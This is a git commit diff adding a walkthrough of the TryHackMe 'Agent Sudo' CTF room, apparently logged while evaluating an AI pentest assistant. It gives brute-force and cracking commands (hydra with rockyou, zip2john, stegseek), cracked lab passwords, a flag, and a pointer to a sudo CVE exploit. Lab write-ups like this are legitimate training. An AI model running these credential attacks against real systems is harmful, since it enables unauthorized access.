Tested AI-OPS on Agent Sudo from THM

antoninoLorenzo · Jul 23, 2024 · 96f086a · 96f086a
1 parent a216a36
commit 96f086a
Showing 1 changed file with 283 additions and 3 deletions.
diff --git a/records/thm_anthem.md b/records/thm_anthem.md
@@ -2,7 +2,9 @@
 
 The target machine is [Anthem](https://tryhackme.com/r/room/anthem), a Windows machine, the type of services are an **HTTP Webiste** and **RDP**. 
 
-## Reconnaissance
+## Considerations
+
+### Reconnaissance
 
 - **Nmap Scans** (+1): The assistant can run basic Nmap scans to identify open ports and services.
 - **Gobuster Directory Enumeration** (+1): It can perform directory enumeration with Gobuster to discover hidden files and directories.
@@ -13,18 +15,296 @@ The target machine is [Anthem](https://tryhackme.com/r/room/anthem), a Windows m
 
 **Overall Usefulness**: the assistant is capable of using basic reconnaissance tools effectively when given clear instructions. It lacks the ability to reason independently but can follow step-by-step tasks such as writing code for automation.
 
-## Initial Access
+### Initial Access
 
 - **Using Metasploit Exploit** (0): Attempts to use exploits found via Searchsploit with Metasploit were unsuccessful.
 - **`rdesktop` Usage** (0): The assistant was required to use `rdesktop` for accessing an exposed RDP service, but was unable to execute it as `rdesktop` is not integrated, and the user lacked the experience to use it independently.
 
 **Overall Usefulness**: the assistant was not effective in gaining initial access. It suggested tools and exploits, but they were either unsuccessful or not properly integrated. User experience also played a role in the limited success.
 
-## Privilege Escalation
+### Privilege Escalation
 
 - **Finding Administrator Credentials** (0): The assistant's suggestions for finding administrator credentials were basic and unhelpful, focusing on simple searches through system folders.
 
 **Overall Usefulness**: the assistant was not useful in the privilege escalation phase. Its suggestions lacked depth and did not contribute to achieving the objective of finding administrator credentials. 
 
 
+## CTF Questions
+
+
+### Enumerate
+
+
+
+- [x] How many open ports?
+
+**Command**: `nmap -sV -O 10.10.230.44 `
+
+**Output**:
+
+```
+
+PORT   STATE SERVICE VERSION
+
+21/tcp open  ftp     vsftpd 3.0.3
+
+22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+
+80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
+
+```
+
+
+
+- [x] How you redirect yourself to a secret page?
+
+> user-agent (try to access the website and this is quite easy)
+
+
+
+- [x] What is the agent name?
+
+**Command**: curl -v -H "User-Agent: C" http://10.10.230.44/
+
+**Command**: curl -v -H "User-Agent: C" http://10.10.230.44/agent_C_attention.php 
+
+
+
+> chris 
+
+
+
+### Hash Cracking and Brute Force
+
+
+
+- [x] FTP password
+
+**Command**: `hydra -l chris 10.10.230.44 ftp -P /usr/share/wordlists/rockyou.txt`
+
+**Output**:
+
+```
+
+...
+
+[21][ftp] host: 10.10.230.44   login: chris   password: crystal
+
+...
+
+```
+
+
+
+> crystal
+
+
+
+- [x] Zip file password
+
+**Command**: `exiftool cutie.png`
+
+**Output**:
+
+```
+
+Warning                         : [minor] Trailer data after PNG IEND chunk
+
+```
+
+
+
+**Command**: `xxd cutie.png`
+
+**Output**:
+
+```
+
+...
+
+000087c0: 2080 a481 0000 0000 546f 5f61 6765 6e74   .......To_agent
+
+000087d0: 522e 7478 740a 0020 0000 0000 0001 0018  R.txt.. ........
+
+000087e0: 0080 4577 7754 8ed5 0100 65da d354 8ed5  ..EwwT....e..T..
+
+000087f0: 0100 65da d354 8ed5 0101 9907 0002 0041  ..e..T.........A
+
+00008800: 4501 0800 504b 0506 0000 0000 0100 0100  E...PK..........
+
+00008810: 6a00 0000 9800 0000 0000                 j.........
+
+```
+
+
+
+**Command**: binwalk -e cutie.png
+
+**Output**:
+
+```
+
+DECIMAL       HEXADECIMAL     DESCRIPTION
+
+--------------------------------------------------------------------------------
+
+0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
+
+869           0x365           Zlib compressed data, best compression
+
+34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
+
+34820         0x8804          End of Zip archive, footer length: 22
+
+```
+
+
+
+**Command**: `zip2john 8702.zip > zip.hash`
+
+**Output**: 
+
+```
+
+...
+
+Proceeding with wordlist:/usr/share/john/password.lst
+
+alien            (8702.zip/To_agentR.txt) 
+
+...
+
+```
+
+
+
+> alien
+
+
+
+- [x] steg password
+
+> Area51 (Found at next step)
+
+
+
+- [x] Who is the other agent (in full name)?
+
+
+
+**Command**: `stegseek cute-alien.jpg /usr/share/wordlists/rockyou.txt`
+
+**Output**:
+
+```
+
+[i] Found passphrase: "Area51"
+
+
+
+[i] Original filename: "message.txt".
+
+[i] Extracting to "cute-alien.jpg.out".
+
+```
+
+
+
+**cute-alien.jpg.out**
+
+```
+
+Hi james,
+
+
+
+Glad you find this message. Your login password is hackerrules!
+
+
+
+Don't ask me why the password look cheesy, ask agent R who set this password for you.
+
+
+
+Your buddy,
+
+chris
+
+```
+
+
+
+> james
+
+
+
+- [x] SSH password
+
+> hackerrules!
+
+
+
+### User Flag
+
+
+
+- [x] What is the user flag?
+
+the first thing that shows up when accessing as james
+
+```
+
+b03d975e8c92a7c04146cfa7a5a313c7
+
+```
+
+This seems like a hash, matter of fact it is MD5
+
+
+
+- [x] What is the incident of the photo called?
+
+
+
+**Command**: scp [email protected]:/home/james/Alien_autospy.jpg ./`
+
+
+
+> Alien Autospy Roswell (Google Images)
+
+
+
+### Privilege Escalation
+
+
+
+- [x] CVE number for the escalation 
+
+
+
+CVE from walktrough is CVE-2019-14287
+
+used [this](https://www.exploit-db.com/exploits/47502) script
+
+must enter "hackerrules!" password
+
+
+
+
+
+- [x] What is the root flag?
+
+
+
+- [x] (Bonus) Who is Agent R?
+
+Looked the name of the guy that created the machine, it was intuition while waiting for a response for privilege escalation.
+
+> deskel
+
+
+
+
+
+